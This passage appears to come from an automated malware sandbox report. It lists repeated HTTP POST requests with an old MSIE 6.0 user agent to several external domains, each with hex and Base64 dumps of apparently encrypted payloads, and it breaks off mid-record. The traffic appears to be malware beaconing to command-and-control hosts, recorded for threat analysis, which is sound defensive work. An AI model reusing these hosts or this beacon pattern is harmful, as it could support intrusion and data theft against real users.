69 47 58 6e 4f 59 50 62 59 61 61 4e 61 46 48 2f 6e 2f 59 4c 6c 77 79 39 2f 64 59 55 79 57 48 34 63 77 3d 3d Data Ascii: BqlUD+obIRN0RXT1zZoWIK2sY+8aMuMqvuyEzN/Og6Sff0FNzTsJW37TOyCALeMIZru9L6XWSHgDG/b8dmR1Y0ly1K78RXDDxy1bUpG8CJ18HKPOjObgFYFq36jaH/WS8Qud3M5/IDcDeao1JJMhUDLHmrWNV2XIQPZGWTtNzbbmNo+ZHwGzgkXHRDAcFMbHIPUFtoDG7gZUVpIEn1BvO/1LKzgp+sqhcW8zwv01fv653UvXoUpHuc1ttE6VonPmSquTUZ/NmpQ0GRbMHsGyn79Ss+kcNEB3QUjnd+BSeoiaofx0VYRYfZGKdZfjZiCUrPip7ycFacYJWZyiCq9ZT6ZqGElNajIXz/aU8e6rIQCevzoYwOTtuFiCzFb0XZEz84faOnFpk9Ra//41xnKWW4AlwNIcNxlTxriyP0HkLICF/+wad0tw6gZMKD+obdbx7YCiFbQCTJYRDYeXbVujfsBiFYtsnAM4p172dGOl8BYqPC7JhF6aEJm2Ye3ciGXnOYPbYaaNaFH/n/YLlwy9/dYUyWH4cw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 6b 42 50 67 4b 49 4c 2f 43 42 50 6b 51 76 47 69 64 62 68 6a 76 51 57 4d 67 36 61 53 71 52 62 36 31 76 30 53 36 46 57 72 32 56 52 6b 71 38 65 6f 2b 70 75 44 76 55 55 6c 6f 56 76 64 33 37 79 67 52 33 70 31 30 58 39 61 67 58 54 61 48 76 75 77 2b 4a 43 79 44 49 69 6d 2b 44 39 77 2b 6c 33 52 77 54 46 6b 48 6a 71 4e 75 67 73 77 69 78 67 63 44 65 68 32 43 34 78 71 63 56 57 76 6c 55 61 4f 77 78 63 34 32 6e 56 55 6c 52 4a 6d 32 32 6f 7a 6f 76 54 4d 34 62 5a 5a 72 4b 45 35 45 6a 30 41 72 37 75 74 6f 68 79 58 46 6e 52 4f 47 65 67 79 53 6b 5a 50 72 34 68 51 6c 50 75 63 35 72 68 47 35 59 71 6f 76 33 53 52 33 53 36 75 58 77 34 4a 52 33 2f 76 2b 77 63 73 50 2f 38 4c 72 4f 6d 4b 30 61 72 46 42 4c 32 4a 2f 44 67 42 48 61 37 64 62 54 39 4c 41 59 75 34 6a 56 4f 48 64 64 34 31 41 46 2b 36 37 6e 71 79 42 6f 53 31 41 70 66 59 37 47 50 4f 74 73 4d 7a 6c 4a 4b 4c 61 47 6c 4e 70 72 33 6e 4f 6a 77 44 57 38 6a 2b 46 4a 51 2b 6d 59 41 39 56 37 6c 2b 68 6c 4c 4c 33 58 74 73 66 65 55 62 68 5a 79 75 49 73 6e 4d 45 72 68 34 6b 68 64 64 79 6c 6b 6d 49 76 53 73 74 58 78 6d 36 2b 4f 35 7a 55 4e 47 45 75 54 4f 62 2f 2f 66 59 42 62 57 39 47 76 58 67 6d 30 54 75 68 2b 6b 45 33 7a 54 76 39 43 67 35 58 6d 6e 6e 69 2b 6b 62 4f 2f 53 38 76 62 68 58 77 52 64 55 4b 64 52 4f 64 55 50 6c 6b 76 75 75 45 75 49 78 67 58 4d 4b 31 4e 73 79 79 6d 49 61 59 4e 65 73 50 52 64 73 66 55 7a 54 58 48 55 32 59 53 49 48 52 5a 73 73 46 72 6a 37 6f 65 6e 38 4a 49 48 31 6c 6a 71 37 66 44 68 2f 34 54 75 52 32 58 4c 65 6e 61 35 70 64 35 50 4b 43 71 67 69 71 46 39 69 49 6c 47 67 63 43 34 46 4c 6a 7a 58 67 78 6f 42 6a 62 6e Data Ascii: kBPgKIL/CBPkQvGidbhjvQWMg6aSqRb61v0S6FWr2VRkq8eo+puDvUUloVvd37ygR3p10X9agXTaHvuw+JCyDIim+D9w+l3RwTFkHjqNugswixgcDeh2C4xqcVWvlUaOwxc42nVUlRJm22ozovTM4bZZrKE5Ej0Ar7utohyXFnROGegySkZPr4hQlPuc5rhG5Yqov3SR3S6uXw4JR3/v+wcsP/8LrOmK0arFBL2J/DgBHa7dbT9LAYu4jVOHdd41AF+67nqyBoS1ApfY7GPOtsMzlJKLaGlNpr3nOjwDW8j+FJQ+mYA9V7l+hlLL3XtsfeUbhZyuIsnMErh4khddylkmIvSstXxm6+O5zUNGEuTOb//fYBbW9GvXgm0Tuh+kE3zTv9Cg5Xmnni+kbO/S8vbhXwRdUKdROdUPlkvuuEuIxgXMK1NsyymIaYNesPRdsfUzTXHU2YSIHRZssFrj7oen8JIH1ljq7fDh/4TuR2XLena5pd5PKCqgiqF9iIlGgcC4FLjzXgxoBjbn
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 72 55 44 4d 6a 44 64 2f 4c 52 4f 39 33 62 51 43 70 6c 50 4e 77 6f 44 71 47 41 2f 74 54 2b 2b 68 57 36 61 49 70 52 41 58 4b 6f 41 32 48 51 35 6a 31 55 61 30 57 6d 6d 39 4e 6b 5a 54 4f 71 79 69 55 37 35 47 35 33 7a 77 75 66 76 36 76 78 6d 39 43 4a 70 6c 31 6b 4c 63 38 77 4b 56 6b 2b 61 73 6d 61 36 52 35 6c 4c 66 2f 6f 74 32 64 67 68 55 65 39 45 64 4d 62 67 70 69 55 32 5a 4b 7a 33 4f 58 71 42 4d 67 37 46 4b 47 6f 65 34 61 42 71 37 7a 37 76 36 33 48 74 77 77 41 58 41 66 78 33 46 50 70 41 36 6d 30 69 7a 57 5a 72 43 75 55 48 35 70 73 31 52 66 4f 31 33 56 6d 65 65 74 71 4e 69 70 42 66 70 44 31 4e 45 36 32 69 4d 5a 32 44 51 55 4a 62 7a 64 73 73 63 37 71 61 73 50 74 7a 46 6a 4c 76 52 7a 4a 69 4f 77 57 67 68 36 32 68 67 72 73 33 68 51 55 35 66 49 4e 36 48 79 68 62 79 76 76 59 67 6b 6c 53 59 69 52 6d 51 48 52 6c 4e 50 63 50 2f 79 51 35 63 54 50 76 4b 4b 44 63 73 47 43 65 57 7a 72 35 39 4b 70 69 4c 4b 77 42 79 5a 6a 4c 38 6f 67 4d 61 73 6b 44 4b 42 75 35 49 4c 63 65 69 66 48 37 74 75 5a 42 44 54 68 34 51 76 74 47 68 65 6b 30 33 44 33 4c 68 64 55 4f 5a 73 78 76 38 52 30 56 78 33 68 4d 76 45 46 31 58 75 66 69 30 2b 62 4c 66 6a 42 7a 38 51 58 5a 4c 77 37 51 62 66 42 67 32 45 4d 51 76 4b 69 46 55 57 32 48 42 38 39 68 47 77 77 5a 4b 6d 52 34 52 42 71 64 73 7a 69 4f 74 36 45 4a 47 4d 54 35 6b 30 4b 66 52 54 41 65 66 4e 4a 56 47 2b 41 37 77 78 56 34 45 53 5a 6d 36 73 73 46 76 6b 54 53 33 35 6f 65 50 4b 4f 36 30 76 4b 4f 78 4e 36 73 61 58 54 58 53 58 77 69 5a 78 53 2f 72 46 75 70 4e 75 2f 51 5a 54 76 69 37 4e 48 4b 52 69 73 79 77 34 59 6d 57 75 57 51 65 72 5a 56 2b 6f 2b 77 4b 70 44 67 4f 42 78 47 47 48 44 42 55 37 34 4c 6f 59 42 6a 5a 34 68 41 77 5a 72 73 73 48 52 35 30 4c 37 30 68 55 58 6f 3d Data Ascii: rUDMjDd/LRO93bQCplPNwoDqGA/tT++hW6aIpRAXKoA2HQ5j1Ua0Wmm9NkZTOqyiU75G53zwufv6vxm9CJpl1kLc8wKVk+asma6R5lLf/ot2dghUe9EdMbgpiU2ZKz3OXqBMg7FKGoe4aBq7z7v63HtwwAXAfx3FPpA6m0izWZrCuUH5ps1RfO13VmeetqNipBfpD1NE62iMZ2DQUJbzdssc7qasPtzFjLvRzJiOwWgh62hgrs3hQU5fIN6HyhbyvvYgklSYiRmQHRlNPcP/yQ5cTPvKKDcsGCeWzr59KpiLKwByZjL8ogMaskDKBu5ILceifH7tuZBDTh4QvtGhek03D3LhdUOZsxv8R0Vx3hMvEF1Xufi0+bLfjBz8QXZLw7QbfBg2EMQvKiFUW2HB89hGwwZKmR4RBqdsziOt6EJGMT5k0KfRTAefNJVG+A7wxV4ESZm6ssFvkTS35oePKO60vKOxN6saXTXSXwiZxS/rFupNu/QZTvi7NHKRisyw4YmWuWQerZV+o+wKpDgOBxGGHDBU74LoYBjZ4hAwZrssHR50L70hUXo=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=amuvqzixxlrkwopttphdmfdzewvulswh; _mcnc=1Data Raw: 57 4d 6c 32 4e 4c 62 4f 33 78 49 37 51 53 7a 43 45 66 62 75 6a 56 6b 46 4b 62 33 57 43 67 6e 6f 53 67 5a 4a 61 66 46 64 67 56 4b 77 42 64 74 56 4b 32 75 4f 4b 33 41 6d 41 69 6b 54 62 47 50 4c 31 55 6e 51 59 2f 6b 48 2f 63 66 50 4b 46 53 6e 76 77 4c 6a 73 41 36 70 61 56 55 71 39 77 31 33 73 52 30 6b 6b 37 4d 4e 57 39 61 55 4b 47 32 70 38 72 66 43 73 62 53 52 53 4b 55 4a 56 7a 68 73 78 6c 38 63 5a 65 54 76 73 43 4e 49 77 35 39 6c 47 54 51 62 4a 63 35 49 41 62 73 64 4f 30 69 79 48 53 6b 66 48 61 72 45 70 41 61 4e 6e 53 77 4b 53 2f 36 55 79 54 74 32 75 49 56 70 39 62 77 36 63 63 6b 39 41 71 47 73 65 36 5a 33 46 4d 72 69 2b 6f 37 77 31 68 4f 62 37 6b 6d 43 37 6c 54 35 38 62 73 78 75 70 30 31 35 62 64 6d 43 5a 52 36 33 47 73 62 4f 38 61 63 7a 41 72 63 34 4d 58 31 57 6b 77 74 67 62 4d 68 68 6e 6f 68 30 51 65 6e 74 42 61 4c 6b 48 77 33 72 30 4b 70 41 58 42 6e 4c 2b 4b 73 47 76 2b 34 76 4b 30 78 31 43 36 73 39 78 31 77 2b 4f 4d 76 6d 32 42 57 57 6e 64 33 36 6c 33 72 68 6a 56 57 6c 47 6e 32 54 38 63 4c 56 5a 61 75 35 44 37 74 6c 70 59 7a 47 43 75 51 43 6b 77 68 50 48 48 79 39 34 74 39 50 2b 48 47 6d 39 6c 6c 5a 57 38 51 65 4b 72 6a 54 6c 4b 68 37 57 4e 43 34 78 39 6d 72 4d 41 72 72 56 57 75 47 55 6b 61 41 58 68 2b 73 49 65 37 50 2b 42 70 2f 61 6d 67 47 31 35 55 7a 34 73 2f 4b 62 58 32 74 51 6b 64 63 57 4f 43 4f 41 44 62 78 69 65 6a 55 6d 4a 57 52 61 35 4e 58 55 46 61 30 78 64 6a 64 77 47 2b 73 56 77 63 71 76 68 4d 58 73 6b 72 43 59 30 65 43 64 78 5a 39 65 48 45 55 48 44 48 63 50 39 48 67 6e 4c 54 45 4c 62 71 76 4b 4d 36 74 70 33 45 79 73 6e 61 6a 33 6f 4e 71 63 53 50 70 35 64 68 37 79 59 6a 58 46 62 44 70 75 4a 61 62 44 36 45 79 47 65 2f 4a 59 78 77 4d 69 61 4d 43 58 5a 4f 6c 41 3d 3d Data Ascii: WMl2NLbO3xI7QSzCEfbujVkFKb3WCgnoSgZJafFdgVKwBdtVK2uOK3AmAikTbGPL1UnQY/kH/cfPKFSnvwLjsA6paVUq9w13sR0kk7MNW9aUKG2p8rfCsbSRSKUJVzhsxl8cZeTvsCNIw59lGTQbJc5IAbsdO0iyHSkfHarEpAaNnSwKS/6UyTt2uIVp9bw6cck9AqGse6Z3FMri+o7w1hOb7kmC7lT58bsxup015bdmCZR63GsbO8aczArc4MX1WkwtgbMhhnoh0QentBaLkHw3r0KpAXBnL+KsGv+4vK0x1C6s9x1w+OMvm2BWWnd36l3rhjVWlGn2T8cLVZau5D7tlpYzGCuQCkwhPHHy94t9P+HGm9llZW8QeKrjTlKh7WNC4x9mrMArrVWuGUkaAXh+sIe7P+Bp/amgG15Uz4s/KbX2tQkdcWOCOADbxiejUmJWRa5NXUFa0xdjdwG+sVwcqvhMXskrCY0eCdxZ9eHEUHDHcP9HgnLTELbqvKM6tp3Eysnaj3oNqcSPp5dh7yYjXFbDpuJabD6EyGe/JYxwMiaMCXZOlA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 6b 42 50 67 4b 49 4c 2f 43 42 50 6b 51 76 47 69 64 62 68 6a 76 51 57 4d 67 36 61 53 71 52 62 36 31 76 30 53 36 46 57 72 32 56 52 6b 71 38 65 6f 2b 70 75 44 76 55 55 6c 6f 56 76 64 33 37 79 67 52 33 70 31 30 58 39 61 67 58 54 61 48 76 75 77 2b 4a 43 79 44 49 69 6d 2b 44 39 77 2b 6c 33 52 77 54 46 6b 48 6a 71 4e 75 67 73 77 69 78 67 63 44 65 68 32 43 34 78 71 63 56 57 76 6c 55 61 4f 77 78 63 34 32 6e 56 55 6c 52 4a 6d 32 32 6f 7a 6f 76 54 4d 34 62 5a 5a 72 4b 45 35 45 6a 30 41 72 37 75 74 6f 68 79 58 46 6e 52 4f 47 65 67 79 53 6b 5a 50 72 34 68 51 6c 50 75 63 35 72 68 47 35 59 71 6f 76 33 53 52 33 53 36 75 58 77 34 4a 52 33 2f 76 2b 77 63 73 50 2f 38 4c 72 4f 6d 4b 30 61 72 46 42 4c 32 4a 2f 44 67 42 48 61 37 64 62 54 39 4c 41 59 75 34 6a 56 4f 48 64 64 34 31 41 46 2b 36 37 6e 71 79 42 6f 53 31 41 70 66 59 37 47 50 4f 74 73 4d 7a 6c 4a 4b 4c 61 47 6c 4e 70 72 33 6e 4f 6a 77 44 57 38 6a 2b 46 4a 51 2b 6d 59 41 39 56 37 6c 2b 68 6c 4c 4c 33 58 74 73 66 65 55 62 68 5a 79 75 49 73 6e 4d 45 72 68 34 6b 68 64 64 79 6c 6b 6d 49 76 53 73 74 58 78 6d 36 2b 4f 35 7a 55 4e 47 45 75 54 4f 62 2f 2f 66 59 42 62 57 39 47 76 58 67 6d 30 54 75 68 2b 6b 45 33 7a 54 76 39 43 67 35 58 6d 6e 6e 69 2b 6b 62 4f 2f 53 38 76 62 68 58 77 52 64 55 4b 64 52 4f 64 55 50 6c 6b 76 75 75 45 75 49 78 67 58 4d 4b 31 4e 73 79 79 6d 49 61 59 4e 65 73 50 52 64 73 66 55 7a 54 58 48 55 32 59 53 49 48 52 5a 73 73 46 72 6a 37 6f 65 6e 38 4a 49 48 31 6c 6a 71 37 66 44 68 2f 34 54 75 52 32 58 4c 65 6e 61 35 70 64 35 50 4b 43 71 67 69 71 46 39 69 49 6c 47 67 63 43 34 46 4c 6a 7a 58 67 78 6f 42 6a 62 6e Data Ascii: kBPgKIL/CBPkQvGidbhjvQWMg6aSqRb61v0S6FWr2VRkq8eo+puDvUUloVvd37ygR3p10X9agXTaHvuw+JCyDIim+D9w+l3RwTFkHjqNugswixgcDeh2C4xqcVWvlUaOwxc42nVUlRJm22ozovTM4bZZrKE5Ej0Ar7utohyXFnROGegySkZPr4hQlPuc5rhG5Yqov3SR3S6uXw4JR3/v+wcsP/8LrOmK0arFBL2J/DgBHa7dbT9LAYu4jVOHdd41AF+67nqyBoS1ApfY7GPOtsMzlJKLaGlNpr3nOjwDW8j+FJQ+mYA9V7l+hlLL3XtsfeUbhZyuIsnMErh4khddylkmIvSstXxm6+O5zUNGEuTOb//fYBbW9GvXgm0Tuh+kE3zTv9Cg5Xmnni+kbO/S8vbhXwRdUKdROdUPlkvuuEuIxgXMK1NsyymIaYNesPRdsfUzTXHU2YSIHRZssFrj7oen8JIH1ljq7fDh/4TuR2XLena5pd5PKCqgiqF9iIlGgcC4FLjzXgxoBjbn
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 42 71 6c 55 44 2b 6f 62 49 52 4e 30 52 58 54 31 7a 5a 6f 57 49 4b 32 73 59 2b 38 61 4d 75 4d 71 76 75 79 45 7a 4e 2f 4f 67 36 53 66 66 30 46 4e 7a 54 73 4a 57 33 37 54 4f 79 43 41 4c 65 4d 49 5a 72 75 39 4c 36 58 57 53 48 67 44 47 2f 62 38 64 6d 52 31 59 30 6c 79 31 4b 37 38 52 58 44 44 78 79 31 62 55 70 47 38 43 4a 31 38 48 4b 50 4f 6a 4f 62 67 46 59 46 71 33 36 6a 61 48 2f 57 53 38 51 75 64 33 4d 35 2f 49 44 63 44 65 61 6f 31 4a 4a 4d 68 55 44 4c 48 6d 72 57 4e 56 32 58 49 51 50 5a 47 57 54 74 4e 7a 62 62 6d 4e 6f 2b 5a 48 77 47 7a 67 6b 58 48 52 44 41 63 46 4d 62 48 49 50 55 46 74 6f 44 47 37 67 5a 55 56 70 49 45 6e 31 42 76 4f 2f 31 4c 4b 7a 67 70 2b 73 71 68 63 57 38 7a 77 76 30 31 66 76 36 35 33 55 76 58 6f 55 70 48 75 63 31 74 74 45 36 56 6f 6e 50 6d 53 71 75 54 55 5a 2f 4e 6d 70 51 30 47 52 62 4d 48 73 47 79 6e 37 39 53 73 2b 6b 63 4e 45 42 33 51 55 6a 6e 64 2b 42 53 65 6f 69 61 6f 66 78 30 56 59 52 59 66 5a 47 4b 64 5a 66 6a 5a 69 43 55 72 50 69 70 37 79 63 46 61 63 59 4a 57 5a 79 69 43 71 39 5a 54 36 5a 71 47 45 6c 4e 61 6a 49 58 7a 2f 61 55 38 65 36 72 49 51 43 65 76 7a 6f 59 77 4f 54 74 75 46 69 43 7a 46 62 30 58 5a 45 7a 38 34 66 61 4f 6e 46 70 6b 39 52 61 2f 2f 34 31 78 6e 4b 57 57 34 41 6c 77 4e 49 63 4e 78 6c 54 78 72 69 79 50 30 48 6b 4c 49 43 46 2f 2b 77 61 64 30 74 77 36 67 5a 4d 4b 44 2b 6f 62 64 62 78 37 59 43 69 46 62 51 43 54 4a 59 52 44 59 65 58 62 56 75 6a 66 73 42 69 46 59 74 73 6e 41 4d 34 70 31 37 32 64 47 4f 6c 38 42 59 71 50 43 37 4a 68 46 36 61 45 4a 6d 32 59 65 33 63 69 47 58 6e 4f 59 50 62 59 61 61 4e 61 46 48 2f 6e 2f 59 4c 6c 77 79 39 2f 64 59 55 79 57 48 34 63 77 3d 3d Data Ascii: BqlUD+obIRN0RXT1zZoWIK2sY+8aMuMqvuyEzN/Og6Sff0FNzTsJW37TOyCALeMIZru9L6XWSHgDG/b8dmR1Y0ly1K78RXDDxy1bUpG8CJ18HKPOjObgFYFq36jaH/WS8Qud3M5/IDcDeao1JJMhUDLHmrWNV2XIQPZGWTtNzbbmNo+ZHwGzgkXHRDAcFMbHIPUFtoDG7gZUVpIEn1BvO/1LKzgp+sqhcW8zwv01fv653UvXoUpHuc1ttE6VonPmSquTUZ/NmpQ0GRbMHsGyn79Ss+kcNEB3QUjnd+BSeoiaofx0VYRYfZGKdZfjZiCUrPip7ycFacYJWZyiCq9ZT6ZqGElNajIXz/aU8e6rIQCevzoYwOTtuFiCzFb0XZEz84faOnFpk9Ra//41xnKWW4AlwNIcNxlTxriyP0HkLICF/+wad0tw6gZMKD+obdbx7YCiFbQCTJYRDYeXbVujfsBiFYtsnAM4p172dGOl8BYqPC7JhF6aEJm2Ye3ciGXnOYPbYaaNaFH/n/YLlwy9/dYUyWH4cw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 59 4d 67 6c 79 56 47 58 67 68 4e 36 47 76 5a 32 38 4f 68 44 43 61 6f 72 6e 33 63 50 57 39 48 4c 46 62 76 45 37 42 6d 56 54 6a 73 57 7a 38 61 32 4e 75 53 61 6e 79 2f 71 4b 38 50 72 4a 6a 42 6a 2b 4b 75 51 59 59 62 2b 55 69 64 51 43 4d 64 4d 5a 4d 44 2f 73 4e 45 78 37 6b 6b 72 52 33 55 4e 64 42 6e 49 4e 5a 32 4c 43 78 79 61 67 67 2b 38 76 79 4a 68 4e 35 39 6e 61 77 70 66 4b 4c 78 72 31 47 43 43 56 36 5a 51 38 67 55 78 65 76 36 74 55 72 4f 61 44 4e 46 55 51 78 74 42 73 2f 7a 70 46 54 36 4f 34 30 43 30 53 6c 38 54 6a 53 4d 39 6d 71 47 35 44 36 39 72 4c 49 66 57 79 2b 4d 6d 4f 66 74 5a 6f 44 4e 64 6b 46 76 76 50 5a 63 30 76 59 4a 67 79 6e 32 78 71 2f 68 6b 2f 6f 5a 54 77 6b 73 44 75 67 57 4b 6c 79 4c 52 62 43 39 72 6f 53 64 32 41 31 32 49 4c 76 51 51 38 56 74 70 6a 79 71 52 77 4a 35 47 47 52 51 4a 69 4a 4c 52 57 2f 4d 47 78 56 4c 2b 41 33 48 47 4a 6c 76 30 4e 34 6a 36 77 69 73 66 51 74 73 33 68 2b 54 62 58 77 49 42 63 4d 6b 4d 2f 31 64 74 45 42 69 4b 64 67 37 53 61 57 6e 79 56 31 6e 61 38 6e 76 4a 46 76 6f 46 4b 54 77 54 75 56 50 72 30 6a 65 55 43 4a 66 37 31 55 55 55 4c 56 4a 53 7a 36 7a 47 38 73 6c 39 51 63 44 73 6b 75 6b 6b 4f 6a 5a 77 2b 37 4e 58 32 48 48 56 63 31 68 4c 71 32 4d 30 57 35 54 2b 4d 5a 79 77 4e 54 6e 4b 51 51 58 50 6a 51 70 6b 33 33 39 58 76 65 4c 4e 68 6f 6d 4b 6d 33 68 75 70 34 6e 2b 39 61 78 4b 74 75 46 75 4f 4c 68 34 49 35 62 44 55 71 63 4f 73 69 72 66 62 6c 49 73 31 39 53 47 70 61 5a 73 39 38 69 6c 47 70 5a 53 71 33 4b 72 62 6e 43 55 32 36 50 4b 36 55 4a 50 4f 33 71 4d 4c 7a 44 6d 63 55 4d 56 49 52 74 57 57 30 46 52 45 68 43 78 7a 5a 67 3d Data Ascii: YMglyVGXghN6GvZ28OhDCaorn3cPW9HLFbvE7BmVTjsWz8a2NuSany/qK8PrJjBj+KuQYYb+UidQCMdMZMD/sNEx7kkrR3UNdBnINZ2LCxyagg+8vyJhN59nawpfKLxr1GCCV6ZQ8gUxev6tUrOaDNFUQxtBs/zpFT6O40C0Sl8TjSM9mqG5D69rLIfWy+MmOftZoDNdkFvvPZc0vYJgyn2xq/hk/oZTwksDugWKlyLRbC9roSd2A12ILvQQ8VtpjyqRwJ5GGRQJiJLRW/MGxVL+A3HGJlv0N4j6wisfQts3h+TbXwIBcMkM/1dtEBiKdg7SaWnyV1na8nvJFvoFKTwTuVPr0jeUCJf71UUULVJSz6zG8sl9QcDskukkOjZw+7NX2HHVc1hLq2M0W5T+MZywNTnKQQXPjQpk339XveLNhomKm3hup4n+9axKtuFuOLh4I5bDUqcOsirfblIs19SGpaZs98ilGpZSq3KrbnCU26PK6UJPO3qMLzDmcUMVIRtWW0FREhCxzZg=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 2f 69 68 42 34 44 4a 49 6e 42 50 72 5a 59 2f 5a 5a 59 6b 45 6a 54 58 49 58 61 77 43 6d 4e 59 61 68 76 46 46 72 64 55 2f 7a 4b 78 43 4f 41 30 61 33 56 68 53 55 69 35 73 5a 34 41 4f 78 30 76 77 78 59 77 75 68 43 54 47 46 31 66 50 30 6a 36 37 69 76 6a 65 35 74 50 75 41 45 6c 46 76 77 78 2f 6a 34 50 62 2b 53 30 66 4b 66 54 50 2b 49 77 4f 4e 57 39 45 36 74 54 55 2f 35 67 45 32 30 46 54 68 6c 73 62 5a 42 31 78 50 48 58 58 5a 4d 31 68 74 5a 41 59 34 4e 4b 76 76 69 46 42 4c 4a 6a 71 79 63 4f 72 34 62 54 68 4c 39 41 6e 34 44 63 37 4a 75 46 4b 36 58 66 67 4c 2b 64 7a 32 72 75 47 64 4e 42 37 77 2b 33 7a 77 52 7a 58 5a 46 6c 52 69 4d 50 53 2b 75 6a 42 43 2f 30 4f 44 4c 2f 34 65 46 33 4a 77 39 6f 32 57 71 51 34 6e 75 42 77 68 6a 70 76 44 6c 63 70 55 44 56 2f 4f 69 4d 63 72 47 59 71 6d 4d 32 6f 52 61 62 76 75 6c 79 58 43 55 62 6f 4b 47 4c 58 35 43 4e 49 6b 4b 48 62 37 57 43 56 4a 5a 64 31 31 6e 49 79 4b 70 70 73 64 6f 46 67 35 74 49 2b 4a 42 76 59 2b 4c 33 70 79 53 67 2b 63 77 71 4a 51 78 42 4c 59 52 4a 4a 41 54 4a 67 46 48 50 7a 47 39 46 7a 6d 44 55 69 6b 46 42 6e 41 38 53 39 75 58 4e 7a 6c 49 69 31 54 33 37 31 4c 72 75 59 4f 39 58 5a 32 74 69 73 79 56 48 7a 45 55 75 57 52 2f 55 47 44 45 58 32 44 6a 50 43 70 69 33 67 76 56 30 5a 30 6a 72 41 55 62 51 36 58 6c 66 48 61 30 56 55 4d 58 4a 39 59 50 2f 39 2f 73 65 77 75 31 51 53 6d 53 41 43 61 4f 54 62 48 4c 4c 78 73 69 59 2f 64 6c 4f 48 78 39 59 67 4f 56 5a 43 6b 57 76 4f 36 76 47 37 37 33 76 75 6e 32 6b 77 55 6d 37 52 51 33 4f 51 35 55 69 62 73 46 62 66 53 56 4c 51 6b 75 35 43 6b 48 69 4b 4d 70 6b 79 49 73 35 4b 45 4c 55 44 41 2f 45 77 59 71 53 31 57 49 56 4d 54 45 55 64 63 6a 49 45 52 6a 42 45 45 32 52 45 50 51 30 35 46 2f 64 59 49 4d 59 7a 4a 74 57 39 50 31 53 56 55 7a 73 4e 36 71 32 38 4e 42 41 3d Data Ascii: /ihB4DJInBPrZY/ZZYkEjTXIXawCmNYahvFFrdU/zKxCOA0a3VhSUi5sZ4AOx0vwxYwuhCTGF1fP0j67ivje5tPuAElFvwx/j4Pb+S0fKfTP+IwONW9E6tTU/5gE20FThlsbZB1xPHXXZM1htZAY4NKvviFBLJjqycOr4bThL9An4Dc7JuFK6XfgL+dz2ruGdNB7w+3zwRzXZFlRiMPS+ujBC/0ODL/4eF3Jw9o2WqQ4nuBwhjpvDlcpUDV/OiMcrGYqmM2oRabvulyXCUboKGLX5CNIkKHb7WCVJZd11nIyKppsdoFg5tI+JBvY+L3pySg+cwqJQxBLYRJJATJgFHPzG9FzmDUikFBnA8S9uXNzlIi1T371LruYO9XZ2tisyVHzEUuWR/UGDEX2DjPCpi3gvV0Z0jrAUbQ6XlfHa0VUMXJ9YP/9/sewu1QSmSACaOTbHLLxsiY/dlOHx9YgOVZCkWvO6vG773vun2kwUm7RQ3OQ5UibsFbfSVLQku5CkHiKMpkyIs5KELUDA/EwYqS1WIVMTEUdcjIERjBEE2REPQ05F/dYIMYzJtW9P1SVUzsN6q28NBA=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 79 77 56 39 44 65 74 76 6c 52 50 4e 6c 75 53 41 77 6b 53 51 73 31 52 39 6c 34 47 78 49 43 6d 64 54 32 43 74 77 32 38 70 79 58 44 68 4e 34 34 4f 69 51 4a 30 74 2f 69 33 78 37 7a 61 77 6c 4a 56 4a 55 61 5a 51 68 43 58 4b 74 75 53 4d 34 6b 4d 63 49 4e 51 43 5a 33 52 69 31 35 4a 70 59 73 63 6b 62 6a 43 5a 44 52 42 4b 64 6f 6b 57 78 4b 50 54 5a 47 31 78 4f 73 63 4f 51 77 79 49 35 6e 54 6a 63 74 53 67 6e 42 79 47 7a 31 5a 55 46 56 6e 41 44 78 72 47 4b 4f 49 32 6a 59 4d 56 2f 55 58 67 58 4c 4a 49 31 62 57 72 62 6c 71 46 49 57 33 6a 7a 30 75 32 2f 31 58 43 6c 4f 4a 65 34 63 41 65 7a 35 61 65 4a 34 39 76 47 34 30 6d 30 62 56 75 58 2f 65 4d 39 2b 4b 4e 61 57 42 6e 44 66 78 51 73 4a 67 36 77 78 46 76 2f 54 72 47 57 76 77 56 36 67 61 6e 30 6e 6e 79 72 7a 39 53 59 65 65 66 56 71 72 65 45 64 62 54 65 64 4a 6b 58 67 34 57 6d 2f 4e 33 59 6f 6d 37 37 30 69 75 2f 49 78 64 45 64 66 69 63 69 73 76 62 41 75 2f 6a 75 4d 59 33 32 6c 74 48 37 4c 7a 46 5a 51 67 51 59 62 52 7a 57 76 32 69 4d 56 30 6b 76 58 78 41 30 6a 69 4c 76 34 35 4e 4e 66 33 6b 65 55 64 37 56 72 71 67 53 2f 2f 2b 47 36 50 72 4b 32 69 4a 55 66 41 53 50 6a 35 